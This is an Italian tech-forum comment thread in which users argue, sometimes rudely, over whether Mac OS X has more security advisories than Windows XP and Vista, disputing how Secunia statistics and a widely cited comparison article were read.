            • Silicon Pirate scrive:
              Re: MAC OS X più vulnerabile di Windows.
              - Scritto da: PLONK_THIS
              TROLL!

              http://punto-informatico.it/b.aspx?i=2145143&m=214se non sai leggere i grafici non è colpa tua.in 5 anni apple ha avuto 110 advisories, vista in un anno ne ha avuti 17. giusto? o vuoi contraddire anche questo? no perchè è quello che quei grafici dicono.se il trend rimane quello, quanto fa 17x5?inoltre, penso che tu ti sia accorto che i grafici di windows hanno in ordinate un valore di 10 e invece quello di osx ha in ordinate 20.adesso del troll lo puoi tranquillamente andare a dare a tuo fratello.
              • logicaMente scrive:
                Re: MAC OS X più vulnerabile di Windows.
                Mi intrometto solo perchè il post citato è il mio...- Scritto da: Silicon Pirate
                - Scritto da: PLONK_THIS

                TROLL!




                http://punto-informatico.it/b.aspx?i=2145143&m=214


                se non sai leggere i grafici non è colpa tua.
                in 5 anni apple ha avuto 110 advisories, vista in
                un anno ne ha avuti 17. giusto? No, non è giusto. In 5 anni, un totale di 6 (SEI!) versioni di Mac OS X - di cui tre server - hanno avuto, COMPRESI I DUPLICATI (una vulnerabilità presente su tutte le versioni viene quindi contata SEI volte) un totale di 110 threats rilevati.Facendo il ragionamento (sbagliato) che fai tu, vorrebbe dire che 110 treats / 5 anni / 6 versioni = 3,6 vulnerabilità all'anno per OGNI S.O. Apple... come vedi giocando coi numeri gli si fa dire ciò che si vuole, anche cose non proprio esatte.
                o vuoi
                contraddire anche questo? no perchè è quello che
                quei grafici
                dicono.L'ho fatto, l'ho contraddetto, i grafici non dicono questo, vedi sopra.
                se il trend rimane quello, quanto fa 17x5?Tirare fuori un trend da un solo campione... segato a statistica, eh?
                inoltre, penso che tu ti sia accorto che i
                grafici di windows hanno in ordinate un valore di
                10 e invece quello di osx ha in ordinate
                20.Se, come scritto altrove, sommi ai valori di windows XP HOME anche quelli dei suoi fratelli maggiori e minori e sopratutto i "cugini" server (la lista non la ripeto) le ordinate devono crescere non di un fattore 2, ma di un ordine di grandezza almeno.
                adesso del troll lo puoi tranquillamente andare a
                dare a tuo
                fratello.Offro una tazza di camomilla a entrambi, salute!
                • Silicon Pirate scrive:
                  Re: MAC OS X più vulnerabile di Windows.

                  No, non è giusto. In 5 anni, un totale di 6
                  (SEI!) versioni di Mac OS X - di cui tre server
                  - hanno avuto, COMPRESI I DUPLICATI (una
                  vulnerabilità presente su tutte le versioni viene
                  quindi contata SEI volte) un totale di 110
                  threats
                  rilevati.ho capito quello che vuoi dire... ma a questo punto, delle versioni prima di vista scusami ma non me ne frega nulla. vista lo considero il primo SO MS abbastanza valido dal punto della sicurezza.

                  Facendo il ragionamento (sbagliato) che fai tu,
                  vorrebbe dire che 110 treats / 5 anni / 6
                  versioni = 3,6 vulnerabilità all'anno per OGNI
                  S.O. Apple...questo è un conto sbagliato. io faccio riferimento ad una sola versione "sicura" del sistema MS, e quindi vista.il sistema vista ha riportato 17 avvisi in un anno e il sistema apple "sicuro" ne ha riportate 22 ogni anno. il dato dei 17 è sicuramente destinato a crescere e a superare i 22. non discuto. ma resta il fatto che è un super passo in avanti per un sistema che è destinato a diventare io più diffuso al mondo. come vedi giocando coi numeri gli
                  si fa dire ciò che si vuole, anche cose non
                  proprio
                  esatte.per me non è esatto il tuo conto, vedi un po'.
                  L'ho fatto, l'ho contraddetto, i grafici non
                  dicono questo, vedi
                  sopra.non hai contraddetto nulla....ci sono 2 grafici distinti tra XP e vista proprio perchè li considerano 2 sistemi profondament differenti dal punto di vista della sicurezza. i sistemi apple sono raggruppati perchè come sicurezza si equivalgono, ma se avessero messo il grafico di Tiger del 2007 sarebbe stato molto simile a quello di vista, questo perchè nel 2007, di sistemi del 2003 ce ne sono pochi in giro e il numero di avvisi sarà sicuramente dato in larga parte dal sistema Tiger.visto come si rigirano le cose?quanti avvisi ha avuto nel 2007 Tiger? te lo chiedo perchè non lo so davvero. con quel dato si capirebbe molto di più.
                  Offro una tazza di camomilla a entrambi, salute!;-)
                • logicaMente scrive:
                  Re: MAC OS X più vulnerabile di Windows.
                  Beh, perlomeno si comincia a capirsi ;)Banalmente tutto nasce dal fatto che si sono usati impropriamente dei dati statistici che, presi in quel modo, non significano una cippa (e lo vado ripetendo da due giorni)!Se ci si riferisce a fonti che io considero "serie", tipo il SANS Institute si vede che i flaws si trovano dappertutto e tentare di fare una classifica per S.O. è un esercizio inutile e fuorviante.Però devo dire che questi flame un po' mi piacciono, ma questa è un'altra storia! (troll)
              • PLONK_THIS scrive:
                Re: MAC OS X più vulnerabile di Windows.
                ti ha già fatto fare una magra figuraccia il collega Logicamente e ancora insisti?
                • Silicon Pirate scrive:
                  Re: MAC OS X più vulnerabile di Windows.
                  non avere argomenti è una brutta cosa eh?
                • PLONK_THIS scrive:
                  Re: MAC OS X più vulnerabile di Windows.
                  argomento già evaso più sopra da altri...ma se ci tieni a rimediar figuracce ad ogni intervento
          • pentolino scrive:
            Re: MAC OS X più vulnerabile di Windows.
            non so, io sono andato alla fonte (secunia) ed il risultato è questo al momento:http://secunia.com/product/96/?task=advisoriesSecunia has issued a total of 113 Secunia advisories in 2003-2007 for Apple Macintosh OS X. Currently, 6% (7 out of 113) are marked as Unpatched with the most severe being rated Moderately criticalme la sto facendo sotto dalla paura, come faccia a funzionare ancora il mio caro leopardino proprio non lo so...
          • FDG scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: saxpax
            mi sa tanto che Apple abbia fatto una figuraccia...Si, già letto... articolo del piffero visto che mette assieme vulnerabilità di software terze parti con quelle del sistema di Apple. Metti lo stesso software su Windows e ottieni gli stessi risultati.Mi chiedo, ma certi "giornalisti" hanno un cervello oppure lo prendono in affitto?
          • qant scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: saxpax
            mi sa tanto che Apple abbia fatto una figuraccia,
            guardate
            qui:
            http://www.italiasw.com/mac-os-x-e-piu-vulnerabile

            il mito di Mac è finito, è più vulnerabile di XP
            e Vista
            insieme.non puoi paragonare Mac con Vista, il quale ha il numero di bug più basso di qualsiasi altro sistema operativodovresti fare il paragone con un altro colabrodo trandy: linux
          • Silicon Pirate scrive:
            Re: MAC OS X più vulnerabile di Windows.
            eh ma vedrai che troveranno sicuramente una scusa *valida*...
          • Mythos scrive:
            Re: MAC OS X più vulnerabile di Windows.
            Immagino la quantità di seghe stellari che ti sarai fatto su questa notizia..
          • Hovercraft scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: saxpax
            mi sa tanto che Apple abbia fatto una figuraccia,
            guardate
            qui:
            http://www.italiasw.com/mac-os-x-e-piu-vulnerabile

            il mito di Mac è finito, è più vulnerabile di XP
            e Vista
            insieme.4 "extremely critical" per xp+vista e zero per mac, non credo che i macomani cambieranno parrocchia tanto facilmente.Poi, le vulnerabilità dipendono comunque da come vengono alla luce. Prendi una vulnerabilità a caso, vedi i riferimenti e vedi quando c'e' scritto "Microsoft ( o apple) ringrazia il tal dei tali per la segnalazione". Vuol dire che chi scova la vulnerabilità fa la cosa giusta e segnala privatamente l'esistenza del problema al produttore. Poi resta privata finche' il produttore si decide a rivelarlo insieme alla patch.Se da questo qualcuno trae conclusioni sul numero effettivo delle vulnerabilità fa un bell'atto di fede.Poi sono dieci anni almeno che i winari dicono che il mac è vulnerabile ma avendo meno mercato i crackers lo lasciano in pace. Sara' anche vero, intanto ho usato mac per dieci anni prima di passare a linux senza il minimo problema, mentre voialtri giu' a riformattare (rotfl)
          • Kling scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: saxpax
            mi sa tanto che Apple abbia fatto una figuraccia,
            guardate
            qui:
            http://www.italiasw.com/mac-os-x-e-piu-vulnerabile

            il mito di Mac è finito, è più vulnerabile di XP
            e Vista
            insieme.Dopo un po' di tempo speso a verificare la massa di dati pubblicati, mi sono fermato inorridito. I dati rilanciati da George OU sono un classico trucco da politico: riempire l'interlocutore di numeri che costui non avrà tempo/modo/opportunità di verificare, e quindi trarne una conclusione a vantaggio dei propri argomenti. Qui elenco alcune delle perle inanellate dal signor George OU, se avrete la pazienza di vangare i suo fango:- VULNERABILITA' DI PERL E SSH CATALOGATE FRA LE VULNERABILITA' DI MAC OS: a nessun utilizzatore normale potranno mai interessare...- VULNERABILITA' DI FLASH CATALOGATE PER MAC OS, QUANDO OVVIAMENTE NON APPARTENGONO AL SISTEMA OPERATIVO, ma Apple le pubblica, e Microsoft (che le ha uguali) no...- UDITE UDITE: LE VULNERABILITA' MICROSOFT NON CONTANO QUELLE DI... INTERNET EXPLORER!!!Io direi che qui qualcuno è cascato in una trappoletta... Complimenti al signor OU. Ah, un'ultima cosa: sapete tutti, vero, che i professionisti della sicurezza vogliono dati sugli EXPLOITS, non sulle vulnerabilità?Provaci ancora, George. Centinaia di commenti a un'accozzaglia di stupidate...
          • LBDV scrive:
            Re: MAC OS X più vulnerabile di Windows.
            Bella questa, mi ha fatto ridere.Com'è, comunque, che Windows, in tutte le sue incarnazioni (95|NT|98|ME|2000|XP|2003|Vista) è L'UNICO O.S. del MONDO ad avere virus. Esistono SOLO ed ESCLUSIVAMENTE per Windows. Anche per i Symbian alla fine sono spariti perchè per proteggersi bastava non avere il BT acceso... ma MS Window CONTINUA ad essere il SOLO S.O. (anche guardando i cellulari/palmari) ad avere VIRUS|WORM ed essere ZOMBIZZATO?Sveglia gente, avere un virus NON E' NORMALE: è un difetto|guasto|errore il cui onere dovrebbe ricadere sulla casa madre (SoftHouse). Esistono altri sistemi (TUTTI GLI ALTRI) che NON HANNO VIRUS.
Chiudi i commenti